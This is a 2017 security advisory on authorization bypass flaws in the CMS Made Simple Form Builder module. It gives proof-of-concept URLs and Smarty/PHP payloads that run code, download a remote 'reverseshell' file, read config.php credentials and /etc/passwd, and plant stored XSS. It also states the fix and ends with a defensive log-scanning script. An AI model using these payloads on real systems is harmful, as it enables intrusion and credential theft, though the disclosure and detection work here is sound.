Security Advisory
Title: CMS Made Simple Form Builder authorization bypass vulnerability
Class: Bypassing Authorization
CVE: CVE-2017-6070 CVE-2017-6071 CVE-2017-6072
Remote: Yes
Local: No
Published: Feb 17 2017 02:00 PM
Updated: Feb 18 2017 11:00 AM
Credit: Peter Arts ([email protected])
Vulnerable: CMS Made Simple Form Builder 0.6.4 (vulnerabilities 2 & 3 only)
CMS Made Simple Form Builder 0.7 (vulnerabilities 2 & 3 only)
CMS Made Simple Form Builder 0.7.1 (vulnerabilities 2 & 3 only)
CMS Made Simple Form Builder 0.7.2 (vulnerabilities 2 & 3 only)
CMS Made Simple 1.x Form Builder 0.7.3
CMS Made Simple 1.x Form Builder 0.7.4
CMS Made Simple 1.x Form Builder 0.8
CMS Made Simple 1.x Form Builder 0.8.1.1
CMS Made Simple 1.x Form Builder 0.8.1.2
CMS Made Simple 1.x Form Builder 0.8.1.3
CMS Made Simple 1.x Form Builder 0.8.1.4
About the module:
This is the next generation of Feedback Forms, which will include an API for modules to use, as well as a general structured data system. CMSMS 1.12.x and 2.x compatible.
Latest Release: 0.8.1.6, 2017-02-17
Project link: http://dev.cmsmadesimple.org/projects/formbuilder
Information:
The CMS Made Simple Form Builder module is prone to multiple vulnerabilities that let remote attackers execute arbitrary code and perform stored XSS attacks, because the module fails to check permissions in several admin pages. An attacker may leverage this issue to execute arbitrary PHP code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access and can be exploited by malicious people to compromise a vulnerable system.
These problems exist in both CMS Made Simple versions 1 and 2, but code execution seems to be possible in version 1 only (and depends on the Smarty configuration).
Affected versions:
0.7.3 through 0.8.1.5 (all three vulnerabilities)
0.6.4 through 0.8.1.5 (vulnerabilities 2 & 3)
CVE-2017-6070: Vulnerability 1 (POC):
CMS Made Simple version 1.x Form Builder before version 0.8.1.6 allows remote attackers to execute PHP code via the cntnt01fbrp_forma_form_template parameter in admin_store_form.
Attackers may exploit this issue through a browser. Steps:
1. Open URL:
http://host/index.php?mact=FormBuilder,cntnt01,admin_store_form,0&cntnt01showtemplate=false&cntnt01form_id=[FORM_ID]
Grab form_id from the hidden input field "cntnt01form_id" in the HTML source of a published webform on the target website, or enumerate starting at 1.
2. Replace contents of the “Template to use to Display Form” (“cntnt01fbrp_forma_form_template”) input field with PHP code wrapped in Smarty PHP tags:
{php}
phpinfo();
{/php}
Limitations: ', ", $, <, > and several other special characters cannot be used, as these are escaped or removed by the CMS Made Simple input sanitizer. Therefore, for example, the PHP string open/close characters ('/") cannot be used, and one is limited to a subset of characters to avoid PHP parser errors.
This can be circumvented by downloading a remote PHP source file using "include()" or "file_get_contents()" and saving its contents to a permanent location:
echo file_put_contents(reverseshell.chr(46).php, file_get_contents([DOWNLOAD_URL]));
If allow_url_fopen is disabled, curl can be used instead.
If PHP tags are disabled in Smarty configuration, “eval” can be used instead (see next section).
3. Invoke PHP code by requesting the website page the form has been published on or via:
http://host/index.php?mact=FormBuilder,cntnt01,default,0&cntnt01showtemplate=false&cntnt01form_id=[FORM_ID]
Print the CMS Made Simple configuration file, which contains the database login credentials; the output appears on the published page:
{php} echo file_get_contents(config.chr(46).php); {/php}
Print /etc/passwd:
{php} echo file_get_contents(DIRECTORY_SEPARATOR.etc.DIRECTORY_SEPARATOR.passwd); {/php}
Stored XSS example using “eval”:
{eval chr(60)}SCRIPT{eval chr(62)}alert(document.cookie){eval chr(60)}{eval chr(47)}SCRIPT{eval chr(62)}
CVE-2017-6071: Vulnerability 2 (POC):
CMS Made Simple version 1.x Form Builder before version 0.8.1.6 allows remote attackers to conduct information-disclosure attacks via exportxml.
Attackers may exploit this issue through a browser.
http://host/index.php?mact=FormBuilder,cntnt01,exportxml,0&cntnt01showtemplate=false&cntnt01form_id=[FORM_ID]
Grab form_id from the hidden input field "cntnt01form_id" in the HTML source of a published webform on the target website, or enumerate starting at 1.
Form properties can disclose email addresses.
CVE-2017-6072: Vulnerability 3 (POC):
CMS Made Simple version 1.x Form Builder before version 0.8.1.6 allows remote attackers to conduct information-disclosure attacks via defaultadmin.
Attackers may exploit this issue through a browser.
http://host/index.php?mact=FormBuilder,cntnt01,defaultadmin,0&cntnt01showtemplate=false
Website forms are disclosed and the XML upload form is visible (its contents are not processed).
Solution:
Add the following line of code to the affected PHP files (action.admin_store_form.php, action.defaultadmin.php, action.exportxml.php):
if (! $this->CheckAccess()) exit;
Please update to version 0.8.1.6 (the fixed version) as soon as possible.
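As an added example that is not part of this advisory or of the Form Builder project, the following Python script scans constructed web-server log lines for requests that reach the three Form Builder actions named above (admin_store_form, exportxml, defaultadmin) through the public front controller index.php, which is where an unpatched install exposes them. It assumes the common combined log format; other formats need their own pattern.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Form Builder actions the advisory names as lacking the CheckAccess() guard
# before version 0.8.1.6.
UNPROTECTED_ACTIONS = {"admin_store_form", "exportxml", "defaultadmin"}

# Combined-log style line: client, request line, status (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def mact_parts(target):
    """Split the CMSMS 'mact' query parameter (module,id,action,inline, e.g.
    FormBuilder,cntnt01,exportxml,0) into (module, action), or None."""
    mact = parse_qs(urlsplit(target).query).get("mact", [""])[0]
    parts = mact.split(",")
    return (parts[0], parts[2]) if len(parts) >= 3 else None


def classify(line):
    """Return (ip, action) when the line requests one of the unprotected
    Form Builder admin actions via index.php, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    if not urlsplit(target).path.endswith("index.php"):
        return None
    parts = mact_parts(target)
    if parts and parts[0] == "FormBuilder" and parts[1] in UNPROTECTED_ACTIONS:
        return m.group("ip"), parts[1]
    return None


def scan(lines):
    """Collect every hit as (ip, action), preserving log order."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines, not taken from any real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Feb/2017:14:00:01 +0000] "GET /index.php?mact=FormBuilder,cntnt01,admin_store_form,0&cntnt01showtemplate=false&cntnt01form_id=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [17/Feb/2017:14:00:02 +0000] "GET /index.php?mact=FormBuilder,cntnt01,exportxml,0&cntnt01showtemplate=false&cntnt01form_id=1 HTTP/1.1" 200 2048',
    '192.0.2.9 - - [17/Feb/2017:14:01:00 +0000] "GET /index.php?mact=FormBuilder,cntnt01,default,0&cntnt01showtemplate=false&cntnt01form_id=1 HTTP/1.1" 200 4096',
    '192.0.2.9 - - [17/Feb/2017:14:01:05 +0000] "POST /index.php?mact=FormBuilder,cntnt01,defaultadmin,0&cntnt01showtemplate=false HTTP/1.1" 200 3000',
    '198.51.100.3 - - [17/Feb/2017:14:02:00 +0000] "GET /about HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, action in scan(SAMPLE_LOG):
        print(f"{ip} requested FormBuilder action {action} via index.php")
```

The public display action "default" (the URL in step 3 above) is deliberately not flagged, since that is how published forms are normally rendered.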